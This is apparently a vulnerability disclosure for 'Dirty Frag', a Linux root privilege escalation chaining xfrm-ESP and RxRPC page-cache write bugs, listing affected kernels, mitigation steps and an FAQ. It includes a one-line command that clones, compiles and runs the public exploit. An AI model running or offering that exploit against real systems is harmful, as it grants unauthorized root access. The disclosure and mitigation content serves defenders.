Dirty Frag: Universal Linux LPE
Source: Hacker News
Abstract
This document describes the Dirty Frag vulnerability class, first discovered and reported by Hyunwoo Kim (@v4bel). It can obtain root privileges on major Linux distributions by chaining the xfrm‑ESP Page‑Cache Write vulnerability and the RxRPC Page‑Cache Write vulnerability.
Dirty Frag extends the bug class that includes Dirty Pipe and Copy Fail. Because it is a deterministic logic bug that does not depend on a timing window, no race condition is required, the kernel does not panic when the exploit fails, and the success rate is very high.
For detailed technical information and the timeline, see the write‑up.
Note (2026‑05‑08)
- The
xfrm‑ESP Page‑Cache Writevulnerability has been assigned CVE‑2026‑43284 and patched in mainline at commitf4c50a4034e6.- The
RxRPC Page‑Cache Writevulnerability has been reserved as CVE‑2026‑43500 for tracking; no patch exists in any tree yet.
Exploiting
One‑line special
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./expThis PoC is provided as accurate information following consultation with linux‑distros. Do not use it on systems that you are not authorized to test.
Cleanup
⚠️ Important: After running this exploit, the page cache is contaminated. To clear the polluted page cache and ensure system stability, either run:
echo 3 > /proc/sys/vm/drop_cachesor simply reboot the system.
Affected Versions
The xfrm‑ESP Page‑Cache Write vulnerability is in scope from commit cac2661c53f3 (2017‑01‑17) up to upstream, and the RxRPC Page‑Cache Write vulnerability is in scope from commit 2dc334f1a63a (2023‑06) up to upstream.
In other words, the effective lifetime of the vulnerabilities is about 9 years.
Dirty Frag has been tested on the following distribution versions:
- Ubuntu 24.04.4:
6.17.0-23-generic - RHEL 10.1:
6.12.0-124.49.1.el10_1.x86_64 - openSUSE Tumbleweed:
7.0.2-1-default - CentOS Stream 10:
6.12.0-224.el10.x86_64 - AlmaLinux 10:
6.12.0-124.52.3.el10_1.x86_64 - Fedora 44:
6.19.14-300.fc44.x86_64 - … (additional versions omitted for brevity)
Mitigation
Because the responsible disclosure schedule and the embargo have been broken, no patch exists for any distribution at the moment. Use the following steps to remove the vulnerable modules and clear the page cache:
# Prevent the modules from loading
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf
# Unload them if they are already loaded
rmmod esp4 esp6 rxrpc 2>/dev/null || true
# Drop caches
echo 3 > /proc/sys/vm/drop_cachesOnce each distribution backports a patch, update accordingly.
FAQ
Why did you chain two vulnerabilities?
xfrm‑ESP Page‑Cache Write provides a powerful arbitrary 4‑byte STORE primitive (similar to Copy Fail) and is present on most distributions, but it requires the privilege to create a user namespace. Ubuntu sometimes blocks unprivileged user namespace creation via AppArmor, preventing the exploit.
RxRPC Page‑Cache Write does not require namespace creation, but the rxrpc.ko module is not included in most distributions. However, on Ubuntu the rxrpc.ko module is loaded by default.
Chaining the two primitives covers each other’s blind spots, allowing root privileges to be obtained on every major distribution. See the technical details document for a deeper explanation.
Another “branded” “Dirty” series?
Yes. This vulnerability is a descendant of Dirty Pipe, and it “dirties” the frag member of struct sk_buff. The name Dirty Frag therefore reflects its lineage.
What is its relationship with the “Copy Fail” vulnerability?
Copy Fail inspired this research. The xfrm‑ESP Page‑Cache Write primitive in the Dirty Frag chain shares the same sink as Copy Fail. Unlike Copy Fail, it is triggered regardless of whether the algif_aead module is present. Consequently, even systems that have applied the public Copy Fail mitigation (blacklisting algif_aead) remain vulnerable to Dirty Frag.
So, how do I fix my Linux?
Refer to the Mitigation section above and the Disclosure Timeline. Because the embargo has been broken, no official patches are available yet for any distribution. Keep an eye on upstream updates and apply them as soon as they are released.